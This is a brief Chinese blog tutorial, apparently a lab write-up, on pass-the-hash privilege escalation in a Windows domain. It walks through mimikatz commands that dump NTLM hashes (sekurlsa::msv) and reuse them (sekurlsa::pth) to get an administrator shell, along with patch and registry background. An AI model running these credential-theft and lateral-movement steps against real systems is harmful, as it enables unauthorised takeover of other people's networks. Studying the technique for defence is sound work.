0x01 漏洞利用条件

1.被pth攻击的计算机未打补丁(KB2871997)
2.拿到一台域成员主机并且拿到管理员组的域用户的NTML
3.对方主机存在相同账号并且是管理员组成员

0x02 本地用户NTML进行PTH攻击

本地用户利用PTH攻击的条件

域控权限提升PTH攻击-LMLPHP

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken

默认设置为0。如果设置为1,则SID为500的管理员也不能通过网络登录的方式获取高权限。

开打mimikatz输入

log 后续输出打印日志

privilege::debug  提升权限

sekurlsa::msv   抓取hash

域控权限提升PTH攻击-LMLPHP

让后pth 攻击

sekurlsa::pth /domian:要攻击的ip /user: 相同的用户名 /ntlm: NTLM哈希

域控权限提升PTH攻击-LMLPHP

弹出一个cmd 窗口 直接输入

域控权限提升PTH攻击-LMLPHP

可以看到c盘

在看看执行计划

域控权限提升PTH攻击-LMLPHP

能看到这个可以证明你拥有最高权限了

这是以本地用户进行的pth攻击

0x03 域账户进行PTH攻击

依旧如此只是在 domian 换成域控名字

sekurlsa::pth /domain:域控名 /user: 相同的用户名 /ntlm: NTLM哈希

域控权限提升PTH攻击-LMLPHP

获得了最高权限

疑惑的是我的域控已经打了补丁(KB2871997)

然而依旧获取了最高权限

这是补丁的原理

安装KB2871997补丁后,其他方面并没有太多的变化。补丁会给本地账号添加一个 S-1-5-113 的SID,为管理组中的本地账号添加一个S-1-5-114的SID,这样方便通过域策略进行管理,例如从域策略中全面禁止这类账号的网络登录

0x04 参考

https://www.harmj0y.net/blog/redteaming/pass-the-hash
is-dead-long-live-localaccounttokenfilterpolicy/
https://www.anquanke.com/post/id/85995
https://blogs.technet.microsoft.com/secguide/2014/09/02/
blocking-remote-use-of-local-accounts/#comment-2525
05-27 16:04